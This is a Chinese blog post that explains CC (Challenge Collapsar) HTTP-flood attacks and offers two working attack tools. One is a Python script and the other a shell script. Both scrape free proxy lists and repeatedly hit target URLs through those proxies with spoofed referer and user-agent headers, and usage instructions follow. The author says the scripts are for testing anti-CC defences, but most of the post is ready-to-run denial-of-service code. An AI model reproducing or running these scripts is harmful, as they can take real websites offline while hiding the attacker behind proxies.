CC(ChallengeCollapsar)主要是用来攻击页面的。大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,访问的人越多,论坛的页面越多,数据库就越大,被访问的频率也越高,占用的系统资源也就相当可观。
最近在做一些防CC的措施,想验证效果就的有类似CC的攻击,所以写了个Python脚本来模拟CC攻击,其原理很简单,就是去网络上拉取一下渣渣代理,然后通过代理去访问服务器,成本低的吓人,但影响却不小…代码如下(该脚本只能用于交流学习,一切因该脚本产生的不良后果,与我无关):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
|
#!/usr/bin/python
#-------------------------------------------------------------------------------
# Name: CC.py
#
# Author: LiuSha
#
# Created: 1/07/2014
# Email: itchenyi@gmail.com
#-------------------------------------------------------------------------------
import urllib2
import re
import os
import threading
import time
import random
class RunCC(threading.Thread):
def __init__(self,proxy,url):
threading.Thread.__init__(self)
self.thread_proxy = proxy
self.thread_url = url
self.thread_stop = False
def run(self):
while not self.thread_stop:
os.system("""wget --ignore-length --cache=off --no-http-keep-alive -t 1 --referer="http://www.10086.com" -U \'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\' -e "http_proxy=http://%s/" "%s" &"""%(self.thread_proxy,self.thread_url))
def stop(self):
self.thread_stop = True
def get_stock_html(URL):
opener = urllib2.build_opener(
urllib2.HTTPRedirectHandler(),
urllib2.HTTPHandler(debuglevel=0),
)
opener.addheaders = [
(\'User-agent\',
\'Mozilla/4.0 (compatible;MSIE 7.0;\'
\'Windows NT 5.1; .NET CLR 2.0.50727;\'
\'.NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\')
]
url = "http://proxy.com.ru/%s"%URL
response = opener.open(url)
return \'\'.join(response.readlines())
def Getting_Url():
global CC_Url
file = open(\'url\',\'r\')
CC_Url = file.readlines()
file.close()
def Getting_list():
global IP_Port
IP_Port = []
for html_list in re.findall(\'list_\d+.html\',get_stock_html("list_1.html")):
print "getting %s\'s IP:PORT"%html_list
IP_Port += eval(re.sub(\'\',\':\',"%s"%re.findall(\'\d+.\d+.\d+.\d+\d+\',get_stock_html(html_list))))
def main():
global CC_Dict
CC_Dict = {}
for i_name in range(len(IP_Port)):
CC_Dict[\'Thread%s\'%i_name] = "RunCC(\'%s\',r\'\'\'%s\'\'\')"%(IP_Port[i_name],random.choice(CC_Url))
for k,v in CC_Dict.items():
k = eval(v)
k.start()
time.sleep(0.6)
k.stop()
if __name__ == \'__main__\':
Getting_Url()
Getting_list()
main()
|
使用方法:
1
2
3
4
5
6
|
###url 文件一行一个url不嫌多###
[root@test-CC CC]# cat url
http://www.ipython.me/about-me
http://www.ipython.me/
###直接运行###
[root@test-CC CC]# python cc.py
|
勇敢的大飞哥也用shell 粗暴的写了一个出来,代码如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
#!/bin/sh
#Email:zhengxiaofeiccc@139.com
url=$1
page_number=`curl http://proxy.com.ru |grep -o "list_.*html"|awk -F "\'" \'{print $NF}\'|tail -1|grep -o \[0-9\]*`
for i in `seq 1 $page_number`
do
curl http://proxy.com.ru/list_$i.html|egrep -o "[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}.*[0-9]{2,4}"|awk -F "<|>" \'{print $1,$NF}\' >> ip.txt
done
while read ip port
do
wget -b --cache=off --ignore-length --referer="http://www.10086.com" -U \'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\' \
-Y on -e "http_proxy=http://$ip:$port/" "$url"
done < ip.txt
|